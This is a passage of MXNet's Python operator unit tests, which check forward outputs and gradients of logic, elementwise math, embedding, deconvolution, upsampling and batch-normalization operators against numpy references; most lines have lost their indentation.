mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0]
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0]
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0]
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out, reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out, reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0], np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"], np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0], data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad, 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
    npout_grad = np.zeros(shape)  # the gradient of sign() is zero everywhere
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2)
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1, npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
    out_grad[:] = 2
npout_grad = out_grad.asnumpy()
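    # d/dx |x| = sign(x), so the expected input gradient is the output gradient times sign(data).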
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad, npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0], rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1], deconv_args_grad[1], rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
@pytest.mark.serial
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
adj = (101,101), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
pad = (1,1),
adj = (1,1),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5,5),
num_filter = 1,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28,28),
num_filter = 3,
kernel = (3,3),
stride = (1,1),
pad = (1,1)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403, 403),
num_filter = 3,
kernel = (7,7),
stride = (5,5),
pad = (2,2)
)
check_deconvolution_gradient(
input_shape = (1,3,5,5),
num_filter = 3,
pad = (1,1)
)
check_deconvolution_gradient(
input_shape = (5,3,100,100),
num_filter = 3,
pad = (3,3)
)
# 1D
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
target_shape = (8,),
pad = (99,), # will be ignored
adj = (101,), # will be ignored
)
check_deconvolution_target_shape(
input_shape = (2,3,4),
kernel = (3,),
stride = (2,),
pad = (1,),
adj = (1,),
)
check_deconvolution_forward_backward(
input_shape = (1,1,5),
num_filter = 1,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (32,3,28),
num_filter = 3,
kernel = (3,),
stride = (1,),
pad = (1,)
)
check_deconvolution_forward_backward(
input_shape = (10, 3, 403),
num_filter = 3,
kernel = (7,),
stride = (5,),
pad = (2,)
)
check_deconvolution_gradient(
input_shape = (1,3,5),
num_filter = 3,
pad = (1,)
)
check_deconvolution_gradient(
input_shape = (5,3,100),
num_filter = 3,
pad = (3,)
)
@with_seed()
def test_deconvolution_forward_with_bias():
"""Check if deconvolution forward can work well with bias=True
"""
def check_deconvolution_forward_with_bias(shape=(1, 16, 5, 5), num_filter=32, num_group=1, kernel=(3, 3), pad=(1, 1)):
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
input_data = mx.random.uniform(-5, 5, shape, ctx=mx.cpu())
y = mx.sym.Deconvolution(data=x, weight=w, num_filter=num_filter, num_group=num_group, kernel=kernel, no_bias=False, pad=pad)
exe = y.simple_bind(ctx=mx.cpu(), x=shape, grad_req='null')
exe.arg_arrays[0][:] = np.random.normal(size=exe.arg_arrays[0].shape)
exe.arg_arrays[1][:] = np.random.normal(size=exe.arg_arrays[1].shape)
exe.forward(is_train=False)
o = exe.outputs[0]
t = o.asnumpy()
check_deconvolution_forward_with_bias((1, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((32, 16, 5), 32, 1, (3,), (1,))
check_deconvolution_forward_with_bias((1, 16, 5, 5), 32, 1, (3, 3), (1, 1))
check_deconvolution_forward_with_bias((32, 16, 5, 5), 32, 1, (3, 3), (1, 1))
def check_nearest_upsampling_with_shape(shapes, scale, root_scale):
arr = {'arg_%d'%i: mx.random.uniform(-10.0, 10.0, shape, ctx=mx.cpu()).copyto(default_context()) for i, shape in zip(range(len(shapes)), shapes)}
arr_grad = {'arg_%d'%i: mx.nd.zeros(shape) for i, shape in zip(range(len(shapes)), shapes)}
up = mx.sym.UpSampling(*[mx.sym.Variable('arg_%d'%i) for i in range(len(shapes))], sample_type='nearest', scale=root_scale)
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
exe.backward(exe.outputs)
for k in range(len(shapes)):
name = 'arg_%d'%k
assert_allclose(arr[name].asnumpy()*root_scale**2*scale**(2*k), arr_grad[name].asnumpy(), rtol=1e-4)
def check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter):
def _init_bilinear(arr, f):
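        # Standard bilinear-interpolation kernel initialization: the weight at (x, y) is
        # (1 - |x/f - c|) * (1 - |y/f - c|), where f is the upsampling factor and c the kernel center.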
weight = np.zeros(np.prod(arr.shape), dtype='float32')
shape = arr.shape
c = (2 * f - 1 - f % 2) / (2. * f)
for i in range(np.prod(shape)):
x = i % shape[3]
y = (i // shape[3]) % shape[2]
weight[i] = (1 - abs(x / f - c)) * (1 - abs(y / f - c))
arr[:] = weight.reshape(shape)
return arr
up = mx.sym.UpSampling(mx.sym.Variable("data"),
mx.sym.Variable('weight'), sample_type='bilinear', scale=root_scale,
num_filter=num_filter, num_args=2)
arg_shapes, out_shapes, _ = up.infer_shape(data=data_shape)
arr = {'data': mx.random.uniform(-5, 5, data_shape, ctx=mx.cpu()).copyto(default_context()),
'weight': mx.nd.array(_init_bilinear(mx.ndarray.empty(arg_shapes[1]).asnumpy(), root_scale))}
arr_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = up.bind(default_context(), args=arr, args_grad=arr_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(exe.outputs)
target_shape = (data_shape[2] * root_scale, data_shape[3] * root_scale)
assert out.shape == data_shape[:2] + target_shape
@with_seed()
def test_nearest_upsampling():
for root_scale in [1,2,3]:
for scale in [1,2,3]:
for num_shape in [1,2,3]:
for base in [1,2,3]:
shapes = [(1,3,base*root_scale*scale**(num_shape-1-i),base*root_scale*scale**(num_shape-1-i)) for i in range(num_shape)]
check_nearest_upsampling_with_shape(shapes, scale, root_scale)
@with_seed()
def test_bilinear_upsampling():
rootscale = [2,3]
scales = [1,2,3]
filters = [1,2,3]
bases = [1,2,3]
for params in itertools.product(rootscale, scales, filters, bases):
root_scale, scale, num_filter, base = params
# bilinear upsampling takes only 1 data and 1 weight
# multi input mode is not applicable
dimension = base*root_scale*scale
kernel = 2 * root_scale - root_scale % 2
data_shape = (1, num_filter, dimension, dimension)
weight_shape = (1, num_filter, kernel, kernel)
check_bilinear_upsampling_with_shape(data_shape, weight_shape, scale, root_scale, num_filter)
@with_seed()
def test_batchnorm_training():
def check_batchnorm_training(stype):
for shape in [(2, 3), (2, 3, 2, 2), (2, 8, 2, 2)]:
data_tmp = np.random.normal(-0.1, 0.1, size=shape)
            s = (shape[1],)
gamma = np.ones(s)
beta = np.ones(s)
gamma[1] = 3
beta[0] = 3
rolling_mean = np.random.uniform(size=s)
rolling_std = np.random.uniform(size=s)
data = mx.symbol.Variable('data', stype=stype)
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
mean_std = [mx.nd.array(rolling_mean).tostype(stype), mx.nd.array(rolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True)
check_numeric_gradient(test, in_location, mean_std, numeric_eps=1e-2, rtol=0.16, atol=1e-2)
# Test varying channel axis
dim = len(shape)
for chaxis in range(-dim, dim):
chaxis_true = chaxis
if chaxis < 0:
chaxis_true = dim + chaxis
shapex = shape
channel_count = shapex[chaxis_true]
data_tmp = np.random.normal(-0.1, 0.1, size=shapex)
gamma = np.ones(channel_count)
beta = np.ones(channel_count)
if channel_count > 1:
gamma[1] = 3
beta[0] = 3
in_location = [mx.nd.array(data_tmp).tostype(stype), mx.nd.array(gamma).tostype(stype),
mx.nd.array(beta).tostype(stype)]
xrolling_mean = np.random.uniform(size=channel_count)
xrolling_std = np.random.uniform(size=channel_count)
xmean_std = [mx.nd.array(xrolling_mean).tostype(stype),
mx.nd.array(xrolling_std).tostype(stype)]
test = mx.symbol.BatchNorm(data, fix_gamma=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=True, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
test = mx.symbol.BatchNorm(data, fix_gamma=False, use_global_stats=True, axis=chaxis)
check_numeric_gradient(test, in_location, xmean_std, numeric_eps=1e-2, rtol=0.2, atol=0.01)
check_batchnorm_training('default')
@xfail_when_nonstandard_decimal_separator
@with_seed()
@pytest.mark.parametrize('op_name', ['BatchNorm', 'SyncBatchNorm'])
@pytest.mark.parametrize('shape', [(24, 2), (24, 3, 4),
(24, 8, 4, 5), (24, 5, 6, 4, 5)])
@pytest.mark.parametrize('fix_gamma', [False, True])
@pytest.mark.parametrize('cudnn_off', [False, True])
@pytest.mark.parametrize('output_mean_var', [False, True])
def test_batchnorm(op_name, shape, fix_gamma, cudnn_off, output_mean_var):
if op_name == 'BatchNorm':
op = mx.nd.BatchNorm
elif op_name == 'SyncBatchNorm':
op = mx.nd.contrib.SyncBatchNorm
else:
raise ValueError(f'Not supported {op_name}')
momentum = 0.9
epsilon = 1e-5
def _test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req):
kwargs = dict(output_mean_var=output_mean_var)
if op_name == 'SyncBatchNorm':
if axis != 1:
return
key = str(op) + str(shape) + str(axis)
kwargs.update(dict(key=key))
if cudnn_off:
return
else:
kwargs.update(dict(axis=axis, cudnn_off=cudnn_off))
nch = shape[axis]
if not fix_gamma:
bn_gamma = mx.nd.random.uniform(shape=(nch,))
bn_gamma.attach_grad(grad_req=gamma_grad_req)
else:
bn_gamma = mx.nd.ones(shape=(nch,))
bn_beta = mx.nd.random.uniform(shape=(nch,))
bn_beta.attach_grad(grad_req=beta_grad_req)
bn_running_mean = mx.nd.zeros(nch)
bn_running_var = mx.nd.ones(nch)
running_mean = mx.nd.zeros(nch)
running_var = mx.nd.ones(nch)
num_iters = 10
expand_shape = [1] * len(shape)
expand_shape[axis] = shape[axis]
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
adX, adW, adb = 0, 0, 0
is_train = data_grad_req != 'null' or \
(not fix_gamma and gamma_grad_req != 'null') or \
beta_grad_req != 'null'
for _ in range(num_iters):
if data_grad_req != 'add':
data = mx.nd.random.uniform(shape=shape)
data.attach_grad(grad_req=data_grad_req)
ograd = mx.nd.random.uniform(shape=shape)
with mx.autograd.record():
output = op(data, bn_gamma, bn_beta,
bn_running_mean, bn_running_var,
momentum=momentum, eps=epsilon,
fix_gamma=fix_gamma, **kwargs)
if output_mean_var:
output, output_mean, output_std = output
if is_train:
output.backward(ograd)
mx.nd.waitall()
data_mean = data.mean(
axis=axis, exclude=True, keepdims=True)
data_var = (data - data_mean).square().mean(axis=axis,
exclude=True,
keepdims=True)
target_output = (data - data_mean) / \
(data_var + epsilon).sqrt() * \
bn_gamma.reshape(expand_shape) + \
bn_beta.reshape(expand_shape)
# squeeze data_mean and data_var
data_mean_flat = data_mean.squeeze()
data_var_flat = data_var.squeeze()
running_mean = running_mean * momentum + \
data_mean_flat * (1 - momentum)
running_var = running_var * momentum + \
data_var_flat * (1 - momentum)
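                # Reference batch-norm backward pass, derived by hand from
                # y = gamma * (x - mean) / sqrt(var + eps) + beta:
                # dX is the data gradient, dW the gamma gradient, and db the beta gradient.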
W = bn_gamma.reshape(expand_shape)
dnx = ograd * W
xsm = data - data_mean
nd = 1.0 / mx.nd.sqrt(data_var + epsilon)
nx = xsm * nd
m = np.prod(shape) / shape[axis]
dvar = (dnx * xsm).sum(axis=axis, keepdims=True,
exclude=True) * (-0.5) * mx.nd.power(nd, 3)
dmean = -nd * dnx.sum(axis=axis, keepdims=True, exclude=True) - \
dvar * xsm.mean(axis=axis, keepdims=True,
exclude=True) * 2.0
dX = dnx * nd + dvar * xsm * (2.0 / m) + dmean * (1.0 / m)
dW = (ograd * nx).sum(axis=axis, exclude=True)
db = ograd.sum(axis=axis, exclude=True)
adX = dX if data_grad_req != 'add' else adX + dX
adW = dW if gamma_grad_req != 'add' else adW + dW
adb = db if beta_grad_req != 'add' else adb + db
atol, rtol = 5e-2, 5e-2
if output_mean_var:
assert_almost_equal(output_mean.asnumpy(),
data_mean_flat.asnumpy(),
atol=atol, rtol=rtol)
if op != mx.nd.contrib.SyncBatchNorm:
assert_almost_equal(output_std.asnumpy(),
(1.0 / (data_var_flat +
epsilon).sqrt()).asnumpy(),
atol=atol, rtol=rtol)
else:
assert_almost_equal(output_std.asnumpy(),
data_var_flat.asnumpy(),
atol=atol, rtol=rtol)
assert_almost_equal(output.asnumpy(), target_output.asnumpy(),
atol=atol, rtol=rtol)
if is_train:
assert_almost_equal(bn_running_mean.asnumpy(
), running_mean.asnumpy(), atol=atol, rtol=rtol)
assert_almost_equal(bn_running_var.asnumpy(
), running_var.asnumpy(), atol=atol, rtol=rtol)
if data_grad_req != 'null':
assert_almost_equal(data.grad.asnumpy(),
adX.asnumpy(), atol=atol, rtol=rtol)
if not fix_gamma:
if gamma_grad_req != 'null':
assert_almost_equal(
bn_gamma.grad.asnumpy(), adW.asnumpy(),
atol=atol, rtol=rtol)
else:
assert((bn_gamma.asnumpy() == 1).all())
if beta_grad_req != 'null':
assert_almost_equal(
bn_beta.grad.asnumpy(), adb.asnumpy(), atol=atol, rtol=rtol)
grad_reqs = ['write'] if len(shape) != 4 else ['null', 'write', 'add']
for data_grad_req in grad_reqs:
for gamma_grad_req in grad_reqs:
if fix_gamma and gamma_grad_req != 'null':
continue
for beta_grad_req in grad_reqs:
for axis in range(len(shape)):
_test_batchnorm_impl(axis,
data_grad_req, gamma_grad_req, beta_grad_req)
@with_seed()
def test_groupnorm():
acc_types = {'float16': 'float32', 'float32': 'float64', 'float64': 'float64'}
def x_hat_helper(x, num_groups, eps):
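        # GroupNorm reshapes (N, C, H, W) to (N, G, C/G, H, W) and normalizes each
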